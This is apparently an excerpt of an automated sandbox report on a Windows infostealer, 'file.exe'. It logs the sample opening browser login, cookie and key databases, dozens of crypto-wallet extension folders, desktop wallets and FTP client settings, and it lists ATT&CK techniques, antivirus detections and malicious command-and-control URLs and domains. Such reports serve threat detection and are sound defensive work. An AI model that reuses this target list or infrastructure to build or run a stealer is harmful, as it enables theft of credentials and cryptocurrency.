              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
              Source: Yara matchFile source: 00000000.00000003.2314759201.000000000134F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2317125677.0000000001366000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2289658698.000000000134B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2317048532.000000000135A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2242304214.0000000001354000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2317070340.000000000135E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2242704780.0000000001354000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2266013955.000000000134D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2314382076.000000000134F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2317025670.0000000001355000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2243356851.0000000001354000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 3180, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 3180, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Windows Management Instrumentation
              1
              DLL Side-Loading
              12
              Process Injection
              34
              Virtualization/Sandbox Evasion
              2
              OS Credential Dumping
              1
              Query Registry
              Remote Services41
              Data from Local System
              1
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              PowerShell
              Boot or Logon Initialization Scripts1
              DLL Side-Loading
              12
              Process Injection
              LSASS Memory751
              Security Software Discovery
              Remote Desktop ProtocolData from Removable Media11
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
              Deobfuscate/Decode Files or Information
              Security Account Manager34
              Virtualization/Sandbox Evasion
              SMB/Windows Admin SharesData from Network Shared Drive3
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
              Obfuscated Files or Information
              NTDS2
              Process Discovery
              Distributed Component Object ModelInput Capture114
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
              Software Packing
              LSA Secrets11
              File and Directory Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading
              Cached Domain Credentials223
              System Information Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              file.exe42%ReversingLabsWin32.Trojan.Symmi
              file.exe100%AviraTR/Crypt.TPM.Gen
              file.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://cook-rain.sbs/apiE100%Avira URL Cloudmalware
              https://cook-rain.sbs:443/apiLocal100%Avira URL Cloudmalware
              https://cook-rain.sbs/qn100%Avira URL Cloudmalware
              https://cook-rain.sbs/apiQQ100%Avira URL Cloudmalware
              http://185.215.113.16/Tn100%Avira URL Cloudphishing
              https://cook-rain.sbs/i100%Avira URL Cloudmalware
              https://cook-rain.sbs/6n(100%Avira URL Cloudmalware
              http://go.microsoft.co0%Avira URL Cloudsafe
              https://cook-rain.sbs/~n100%Avira URL Cloudmalware
              https://cook-rain.sbs/ro100%Avira URL Cloudmalware
              https://cook-rain.sbs/&100%Avira URL Cloudmalware
              https://cook-rain.sbs/-x100%Avira URL Cloudmalware
              http://185.215.113.16/off/def.exe4100%Avira URL Cloudphishing
              https://cook-rain.sbs/)n100%Avira URL Cloudmalware
              https://cook-rain.sbs/L#u100%Avira URL Cloudmalware
              https://cook-rain.sbs/Fn100%Avira URL Cloudmalware
              NameIPActiveMaliciousAntivirus DetectionReputation
              s-part-0014.t-0009.t-msedge.net
              13.107.246.42
              truefalse
                high
                cook-rain.sbs
                188.114.96.3
                truefalse
                  high
                  s-part-0017.t-0009.t-msedge.net
                  13.107.246.45
                  truefalse
                    high
                    www.google.com
                    142.250.185.228
                    truefalse
                      high
                      js.monitor.azure.com
                      unknown
                      unknownfalse
                        high
                        mdec.nelreports.net
                        unknown
                        unknownfalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          peepburry828.sbsfalse
                            high
                            p10tgrace.sbsfalse
                              high
                              processhol.sbsfalse
                                high
                                https://cook-rain.sbs/apifalse
                                  high
                                  https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.jsfalse
                                    high
                                    p3ar11fter.sbsfalse
                                      high
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cfchromecache_105.7.drfalse
                                        high
                                        https://duckduckgo.com/chrome_newtabfile.exe, 00000000.00000003.2243153971.000000000578A000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://cook-rain.sbs:443/apiLocalfile.exe, 00000000.00000002.2616863520.00000000012E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://cook-rain.sbs/apiQQfile.exe, 00000000.00000003.2266013955.000000000134D000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://duckduckgo.com/ac/?q=file.exe, 00000000.00000003.2243153971.000000000578A000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/chromecache_105.7.drfalse
                                              high
                                              https://www.linkedin.com/cws/share?url=$chromecache_87.7.dr, chromecache_97.7.drfalse
                                                high
                                                https://cook-rain.sbs/apiEfile.exe, 00000000.00000003.2314759201.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2317048532.000000000135A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2337538381.000000000135C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2317141941.000000000135B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2314382076.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2317025670.0000000001355000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2317633873.000000000135C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2317211761.000000000135B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000000.00000003.2243153971.000000000578A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://github.com/Youssef1313chromecache_105.7.drfalse
                                                    high
                                                    https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpgfile.exe, 00000000.00000003.2291709634.000000000574E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
